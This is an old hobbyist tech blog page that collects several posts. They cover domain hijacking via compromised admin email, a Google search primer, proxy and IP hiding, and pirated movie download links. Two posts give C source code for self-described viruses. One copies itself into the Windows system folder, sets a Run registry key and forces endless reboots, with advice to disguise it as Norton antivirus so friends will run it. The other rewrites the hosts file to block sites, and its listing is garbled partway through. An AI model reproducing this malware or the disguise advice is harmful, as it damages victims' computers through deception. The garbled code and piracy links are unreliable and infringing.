TECHFREAK: 2009

Thursday, August 20, 2009

Domain Hijacking – How to Hijack a Domain

In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.

Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).

The operation of domain name is as follows

Any website say for example gohacking.com consists of two parts. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.

1. After registering a new domain name, we get a control panel where in we can have a full control of the domain.

2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.

For a clear understanding let me take up a small example.

John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.

What happens when a domain is hijacked

Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.

For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).

In this case the John’s domain name (abc.com) is said to be hijacked.

How the domain names are hijacked

To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients

1. The domain registrar name for the target domain.

2. The administrative email address associated with the target domain.

These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.

To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.

The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.

Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

How to protect the domain name from being hijacked

The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.

A Virus Program to Restart the Computer at Every Startup

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.

#include
#include
#include

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:
target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}

NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.

Compiling The Scource Code Into Executable Virus.

1. Download the Source Code Here
2. The downloaded file will be Sysres.C
3. For step-by-step compilation guide, refer my post How to compile C Programs.

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.

1. Reboot your computer in the SAFE MODE
2. Goto X:\Windows\System (X can be C,D,E or F)
3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.

Logic Behind The Working Of The Virus

If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.

LOGIC:
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.

AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)

After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

Hack Protect your Orkut Account

This post is meant for providing some safety measures to prevent your Orkut account from being hacked. There is not much you have to take care of. Just follow the simple steps and never get your orkut account hacked in your life.

1. Never try to login/access your Orkut account from sites other than Orkut.com.

2. Never click on any links from the sources you don’t trust while accessing your Orkut account. (or while accessing any other Google services like Gmail,Blogger etc.)

3. Delete any links on your scrapbook, no matter if a known or unknown person have sent it.

4. Never disclose your orkut login details with anyone.

5. Never ever use Javascripts on Orkut, no matter whatever it claims to do. Get satisfied with the services provided by default! Avoid using third party Scripts which might be malicious.

6. Never get excited to see a site claiming to have 1000 cool orkut tricks for which you have to just log in to your orkut account. Don’t trust that site. That’s a Phishing site.

7. Never tick the box “REMEMBER ME” on the orkut homepage if you are surfing from a cafe or a public area.

8. Always remember to hit Sign out button, when you are done.

Friday, August 14, 2009

What is "Google"?

Google is a play on the word googol, which was coined by Milton Sirotta, nephew of American mathematician Edward Kasner, and was popularized in the book, "Mathematics and the Imagination" by Kasner and James Newman. It refers to the number represented by the numeral 1 followed by 100 zeros. Google's use of the term reflects the company's mission to organize the immense, seemingly infinite amount of information available on the web.

Originally called "Backrub", the logic behind the Google search engine was develop by graduate students Larry Page and Sergey Brin at Stanford University in 1995. Their first place of business was literally a garage. The garage location was chosen because it had a washer/dryer and a hot tub out back, they were already serving 10,000 searches a day.

try this link--
http://www.google.com/corporate/history.html

So How Does Google Work?
* Crawls and indexes web pages et al.
* Stores copies of web pages and graphics on their caching servers
* Presents users with simple front end to query the database of cached pages
* Returns search results in a ordered fashion based upon relevancy

Anatomy of a Search
http://computer.howstuffworks.com/search-engine1.htm
1]
Server Side

2]
Client Side

What Can Google Search?
* Adobe Portable Document Format (pdf)
* Adobe PostScript (ps)
* Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
* Lotus WordPro (lwp)
* MacWrite (mw)
* Microsoft Excel (xls)
* Microsoft PowerPoint (ppt)
* Microsoft Word (doc)
* Microsoft Works (wks, wps, wdb)
* Microsoft Write (wri)
* Rich Text Format (rtf)
* Shockwave Flash (swf)
* Text (ans, txt)

So What Determines Page Relevance and Rating?
* Exact Phrase: are your keywords found as an exact phrase in any pages?
* Adjacency: how close are your keywords to each other?
* Weighting: how many times do the keywords appear in the page?
* PageRank/Links: How many links point to the page? How many links are actually in the page?

Equation: (Exact Phrase Hit)+(AdjacencyFactor)+(Weight) * (PageRank/Links)

How Do I Get Results?
* Pick your keywords carefully & be specific
* Do NOT exceed 10 keywords
* Use Boolean modifiers
* Use advanced operators
* Google ignores some words:

a, about, an, and, are, as, at, be, by, from, how, i, in, is, it, of,

on, or, that, the, this, to, we, what, when, where, which, with

Google's Boolean Modifiers
* AND is always implied.
* OR: Escobar (Narcotics OR Cocaine)
* "-" = NOT: Escobar -Pablo
* "+" = MUST: Escobar +Roberto
* Use quotes for exact phrase matching: "nobody puts baby in a corner"

OR

"there are known knowns; there are things we know we know. We also know there are known unknowns; that is to say we know there are some things we do not know. But there are also unknown unknowns, the ones we don't know we don't know."

Saturday, August 8, 2009

Firewalls for Dummies

A system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in both hardware and software, or a combination of both. Firewalls are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets.

DOWNLOAD LINK

Scary Movie 4 (2006) DVDRip

LINKS FOR DOWNLOAD

http://rapidshare.com/files/157753101/ScaryMovie4.part1.rar
http://rapidshare.com/files/157749946/ScaryMovie4.part2.rar
http://rapidshare.com/files/157749961/ScaryMovie4.part3.rar
http://rapidshare.com/files/157749141/ScaryMovie4.part4.rar

Transporter.3 [2008]DvDrip-aXXo

Hide IP address-Real way to hide your IP address

Here in this post I will try to give you every possible information to hide the IP address.If you seriously want to hide your IP address then this post is for you!

One of the most frequently asked questions by the internet users is How To Hide IP Address ?. Many times it becomes necessary to hide the real IP address for the sake of privacy.For this, I have tried many softwares, proxy servers and many such tools that guaranteed to hide my IP address.But still none of them worked for me. I think most of you have the same experience.Are you fed up with these dummy softwares that fails to hide the real IP address? Then is there any working way to hide the IP address?

YES, you can definitely hide your IP .

Now I’ll come to the heart of the post, which contains the answer to your curious question How to Hide the IP address ? The only solution to hide your IP address is by using a Proxy Server.But Wait! The story doesn’t end here.Even though proxy servers are the only way to hide your IP address, there are several ways of connecting your PC to the proxy server.Before setting up the connection with the proxy servers you must know some information about different types of proxy servers and their uses.

1. Transparent Proxy Server
This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used to speedup the web browsing since thay have a very good ability to cache websites.But they do not conceal the IP of it’s users. It is widely known as transparent proxy because it will expose your real IP address to the web.This type of proxy server does not hide your IP address.

2. Anonymous Proxy Server
This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users. This type of proxy server will hide your IP address.

3. Distorting Proxy Server
This type of proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers. This type of proxy server will hide your IP address.

4. High Anonymity Proxy Server ( Elite Proxy)
This type of proxy server does not identify itself as a proxy server and does not make available the original IP address. This type of proxy server will hide your IP address.So this is the best way to mask your IP.

Which Proxy Server is the best to Hide My IP ?

I know, you can answer this question better than me.Obviously High Anonymity Proxy or Elite Proxy is the best to hide your IP.But it’s not easy to get a list of working elite proxies.If you search the Google, you will definitely get tons of proxy list.You’ll get a list of proxies in the following format

IP:Port Number
Eg: 221.90.45.67:8080 (221.90.45.67 is the IP of the proxy server and 8080 is the port number)
But most of them don’t work.Here are some of the problems/risks associated with using free proxies that are available on the internet.

Most of them do not work since the proxy servers frequently changes it’s IP/Port number.
Even if you find a working proxy server it may be too slow.
Your privacy is not guaranteed since all your traffic is routed through the proxy server.
The administrators of the proxy servers may steal your valuable information such as passwords,SSN (Social security number),Credit Card details etc.
So with all these being the risks then how to find a Working,fast,Highly Anonymous and secured Proxy servers?

Now I will give a list of softwares that will really hide your IP address.I have tried many such softwares and have found only few of them working perfectly.Here is a list of working IP Hiding softwares that you can try.I have listed them in the order of their popularity

1. Hide The IP

Let’s you choose the country,Type and speed of the proxy.Not so popular but personally I recommend this to the users.

2. Hide My IP

3. Hide IP NG

You can get more informations about these products on their respective homepages.

How to ensure that the IP is hidden ?

Before you hide your IP you can check your real IP by visiting the following site.

WhatIsMyIPAddress.Com

Once you get your real IP, switch on your IP hiding software.Now once again visit the above site and check your IP address.If you see a new IP then this means that your software is doing the right job.Also the above site(Whatismyipaddress.com) is capable of detecting many proxies.If you see the words such as “Suspected proxy server or network sharing device” or similar words then it means that the proxy you are using is not an Elite Proxy.

One Final Word before you leave! Even though Elite proxies are almost undetectable this doesn’t mean that you can escape from online crimes by hiding your IP.There are many proxy detecting services available which detect almost any proxy.So if you involve in any cyber crimes then you will definitely be behind the bars.Using proxy will not help you in this case.

One More thing, It is unsafe to use proxy during e-commerce transactions such as Online banking,Online Credit Card payment etc.So please avoid proxies during these circumstances.

A Virus Program to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.
Here is the sourcecode of the virus.
#include#include#include
char site_list[6][30]={“google.com”,“www.google.com”,“youtube.com”,“www.youtube.com”,“yahoo.com”,“www.yahoo.com”};char ip[12]=”127.0.0.1″;FILE *target;
int find_root(void);void block_site(void);
int find_root(){int done;struct ffblk ffblk;//File block structure
done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);/*to determine the root drive*/if(done==0){target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);/*to open the file*/return 1;}
done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);/*to determine the root drive*/if(done==0){target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);/*to open the file*/return 1;}
done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);/*to determine the root drive*/if(done==0){target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);/*to open the file*/return 1;}
done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);/*to determine the root drive*/if(done==0){target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);/*to open the file*/return 1;}
else return 0;}
void block_site(){int i;fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);for(i=0;i<6;i++) success="0;success="find_root();if(success)block_site();}" href="http://blogsplane.blogspot.com/2009/07/how-to-compile-c-programs.html" target="_blank">How to compile C Programs.
Testing
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run. %windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1—————————google.com
5. Delete all such entries which contain the names of blocked sites.

TECHFREAK